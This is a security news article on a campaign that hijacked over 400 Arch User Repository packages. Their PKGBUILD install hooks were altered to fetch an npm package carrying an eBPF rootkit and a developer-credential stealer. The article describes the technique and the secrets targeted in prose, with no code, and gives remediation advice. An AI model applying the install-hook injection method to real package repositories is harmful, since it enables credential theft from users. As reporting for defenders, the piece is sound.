More than 400 packages in the Arch User Repository (AUR) were discovered distributing a Linux rootkit and an infostealer, according to reporting and research shared this week.
Scale and vector: AUR packages altered to fetch malicious code
The compromise affected over 400 packages hosted in the AUR, a community-maintained catalog of package build scripts (PKGBUILDs) used by Arch Linux and Arch-based distributions to supply software not in the official repositories. Independent Federated Intelligence Network (IFIN) member Michael Taggart reported that a new maintainer account was spoofing a trusted publisher on AUR and that the compromised packages were modified with preinstall scripts that download and execute an npm package called atomic-lockfile.
AUR’s role — providing proprietary applications, beta/nightly releases, niche utilities and older package versions — makes it essential to many users. But that same openness means ownership changes can go unnoticed, creating an opportunity for threat actors to push malware via modified PKGBUILDs and install scripts.
atomic-lockfile: the npm package at the center
Independent security researcher Whanos examined one sample of atomic-lockfile and found it included a Linux ELF payload named deps. Whanos described that payload as a "credential stealer with optional root-only eBPF [extended Berkeley Packet Filter] rootkit capabilities." Sonatype, a supply-chain management company, independently published analysis tying atomic-lockfile to the AUR campaign; Sonatype said attackers added a post-install script to the PKGBUILD to invoke npm and retrieve the malicious package.
eBPF rootkit and infostealer capabilities explained
Analysts describe the deployed binary as combining two dangerous features. With eBPF present, the code can run inside the kernel with elevated privileges and hide local processes, files, and network interfaces. Whanos characterized the toolset as "designed for developer workstations and build environments."
Whanos lists the types of data targeted: "browser and Electron application data, Slack, Microsoft Teams, Discord, GitHub, npm, Vault, Docker/Podman, SSH, VPN material, shell histories, and other local developer secrets." Sonatype’s analysis complements that view, finding the Linux binary contains infostealer functionality that targets GitHub credentials, SSH artifacts, HashiCorp Vault tokens, browser cookie databases, Slack, Discord, Microsoft Teams and Telegram data. Sonatype also observed that the binary can archive data, handle multi-part files, and perform HTTP uploads — the components needed for exfiltration.
Attacker technique: hijacked orphaned packages and modified PKGBUILDs
Sonatype’s researchers reported that the actor hijacked at least 20 orphaned AUR packages — packages without an active maintainer — and modified their PKGBUILD files to include a post-install script that invoked npm to install atomic-lockfile during package installation. IFIN and Sonatype describe parallel findings: the attacker added script hooks to build/install workflows so that ordinary package installation would retrieve the malicious npm artifact.
The method leverages the way AUR PKGBUILDs are written as Bash scripts that instruct Arch’s package tools how to download, compile and install software; by injecting post-install or preinstall commands, an attacker can execute arbitrary code on the target machine at package installation time.
Arch maintainers, user guidance, and remediation steps
AUR maintainers are actively working to identify and remove malicious commits and ban the accounts that pushed them. Arch Linux package maintainer Jonathan Grotelüschen urged users to report any malicious package they find. Michael Taggart also pointed users to a script that checks for the atomic-lockfile malware on a system.
Analysts advise that users review the list of affected packages and the indicators of compromise provided by researchers such as Whanos. If a system is found to contain a compromised package, the guidance in the reporting is explicit: rotate all credentials and consider reinstalling Arch from scratch, because a rootkit may survive standard cleaning efforts.
That prescription highlights the central risk here: a community-maintained repository can speed distribution of useful software while also enabling supply-chain abuse if account ownership and build scripts are not tightly monitored. For Arch users and maintainers, the immediate tasks are removal, credential rotation and deeper host validation; for organizations that rely on developer workstations, the episode underscores the need to treat package sources and build-time scripts as high-risk attack surfaces.
